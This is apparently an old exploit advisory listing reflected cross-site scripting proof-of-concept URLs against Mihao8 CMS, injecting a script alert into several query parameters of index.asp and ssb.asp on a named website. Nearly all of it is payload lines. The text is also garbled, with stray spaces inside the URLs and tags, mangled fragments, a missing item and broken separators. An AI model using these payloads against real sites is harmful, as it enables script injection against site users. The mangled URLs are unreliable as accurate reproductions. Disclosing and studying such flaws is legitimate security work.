# Exploit Title: Mihao8 CMS Multiple XSS Vulnerabilities
# Date: 2010-4-23
# Author: riusksk (quange)
# Tested on: [Windows 7]
========================================================== ========================================================== ========================================================== =
Mihao8 CMS Multiple XSS Vulnerabilities
========================================================== ========================================================== ========================================================== =
# Exploit Code:
========================================================== ================= 0x1 ==================================== ========================================================== =
Asp? ForumID = 2 & subclassID = 1 & act = 1 & classicID = 1> "> & page = 1> http://www.mihao8.com/index.asp? ForumID = 2 & subclassID = 1 & act = 1 & classicID = 1> "> <script> alert (" riusksk ") </script> & page = 1
========================================================== ================= 0x3 ==================================== ========================================================== =
"> & ClassicID = 1 & page = 1> http://www.mihao8.com/index.asp? ForumID = 2 & subclassID = 1 & act = 1> "> <script> alert (" riusksk ") </script> & classicID = 1 & page = 1
========================================================== ================= 0x4 ==================================== ========================================================== =
"> & Act = 1 & classicID = 1 & page = 1> http://www.mihao8.com/index.asp? ForumID = 2 & subclassID = 1> "> <script> alert (" riusksk ") </script> & act = 1 & classicID = 1 & page = 1
========================================================== ================= 0x5 ==================================== ========================================================== =
"> & Act = 1 & classicID = 1 & page = 1> http://www.mihao8.com/ssb.asp? ForumID = 1 & subclassID = 1> "> <script> alert (" riusksk ") </script> & act = 1 & classicID = 1 & page = 1
========================================================== ================= EOF ==================================== ========================================================